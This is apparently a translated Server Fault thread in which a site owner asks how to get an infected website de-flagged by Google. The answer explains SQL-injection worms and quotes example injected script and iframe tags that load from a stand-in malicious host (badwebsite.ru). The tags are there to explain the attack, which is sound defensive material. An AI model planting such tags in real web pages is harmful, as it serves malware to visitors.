Web-Server

我的網站被感染了,我恢復了未感染文件的備份,取消標記為危險需要多長時間?

  • April 15, 2012

我的網站 www.sagamountain.com 最近被惡意軟體分發者感染(或者至少我認為可能已經感染)。

我已刪除所有外部內容、Google廣告、螢火蟲聊天等。

我上傳了幾週前的備份,當時沒有問題。

我修補了 SQL 注入漏洞。

現在,將其取消標記為危險需要多長時間?我在哪裡可以聯繫Google?

我不確定這是否是發布它的正確位置,但由於它可能是伺服器問題,我也可以。站點可以通過病毒在整個伺服器上註入base64程式碼,還是僅通過sql注入?

謝謝你的幫助,病毒把我嚇壞了。

是否有可以掃描我的頁面並告訴我問題所在的線上病毒掃描程序?

關於Google,查看他們關於受惡意軟體感染的網站的頁面。

我的網站和 Google › 我的網站被黑了

您將需要登錄到他們的網站管理員工具頁面,將您的網站添加到您的帳戶並執行驗證步驟。然後,您將可以訪問做一些事情,例如要求您的網站接受審查,不再被感染。

這是當今相對普遍的問題。許多蠕蟲試圖通過 SQL 注入或修改本地 .html 內容,然後將其上傳到 Web 伺服器,從而使自己進入您的伺服器程式碼。通常他們會嘗試放置:

<script src='http://badwebsite.ru/blah.js'></script>

要麼

<iframe src='http://badwebsite.ru/blah.html' />

通過 SQL 注入或原始碼修改進入您的源頁面。

據我所知,這些蠕蟲通過 JavaScript 混淆引擎或類似引擎修改它們的攻擊向量,並且難以掃描。

最近兩次大規模遠端程式碼執行使這些攻擊成為可能:

  • Adobe Flash JavaScript 漏洞利用允許使用大約 15K 的任意程式碼創建 Flash 對象。
  • 對 Windows 系統上由 Microsoft .NET 3.5 安裝的 Firefox 中的 Windows Presentation Framework 擴展的利用。

這兩者都是巨大的安全隱患。

您應該盡可能在 Web 應用程序開發中使用參數綁定,以避免 SQL 注入攻擊。

引用自:https://serverfault.com/questions/78439